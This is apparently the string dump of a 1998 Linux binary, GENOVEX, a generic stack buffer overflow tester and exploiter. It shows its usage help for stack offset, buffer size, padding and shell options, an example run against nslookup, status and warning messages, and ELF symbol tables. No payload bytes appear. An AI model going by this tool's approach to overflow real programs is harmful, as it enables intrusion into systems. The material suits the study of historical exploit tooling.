ELF
/lib/ld-linux.so.1
libc.so.5
printf _DYNAMIC atol memcpy perror malloc __environ _init __libc_init environ __fpu_control setenv memset strcmp _fini atexit _GLOBAL_OFFSET_TABLE_ exit __setfpucw strlen execvp _etext _edata __bss_start _end

/bin/sh
Usage: %s [-o stackofs] [-b bufsiz] [-p padsiz] [-s shell] [-i ident] [-e varname] target [args|ident]*
 is the offset the target's stack pointer will have, relative to this program's. The bigger the buffer size, the less precise it can be. Defaults to %d.
 is the exact size of the buffer we are overflowing. Defaults to %d and can be approx if using padding.
 is the padding size. It allows to overwrite other variables between the end of the buffer and the stack pointer. It defaults to %d.
 is the full path to a shell name to be executed by target. /usr/bin/id very useful. Default: %s.
 is a pattern used to identify the code string within the target arguments. Defaults to '%s'.
 is the name of an environment variable to be set to the code string. By default, none is set.
 is the program to test, followed by some arguments and the pattern used to replace the sensible one. Ex: %s -o 300 -b 260 -s /bin/ls nslookup @

GENOVEX v0.1 - 1998/09/01 - Willy Tarreau
GENeric buffer OVerflow tester and EXploiter for Linux.

-o
-b
-p
-s
-i
-e
Error: padding can not exceed 127 bytes at the moment.
Version 0.2 will get rid of this limitation if really needed.
Error: buffer too small for shell name + code.
- Using buffer size of %d bytes.
- ESP set to 0x%08X - 0x%08X = 0x%08X.
****WARNING**** ESP encoding contains 0x00 !!
- Padding with %d bytes @rel0x%08X.
- Setting the shell name : %s.
- Coding the launcher.
- Filling till the start of the buffer : %d bytes.
- Setting environment variable %s
setenv
****WARNING**** code contains 0x00 at 0x%04X : %02X %02X %02X %02X
-> launching %s
execvp says

GCC: (GNU) 2.7.2.l.3
GCC: (GNU) 2.7.2

.symtab .strtab .shstrtab .interp .hash .dynsym .dynstr .rel.bss .rel.plt .init .plt .text .fini .rodata .data .ctors .dtors .got .dynamic .bss .note .comment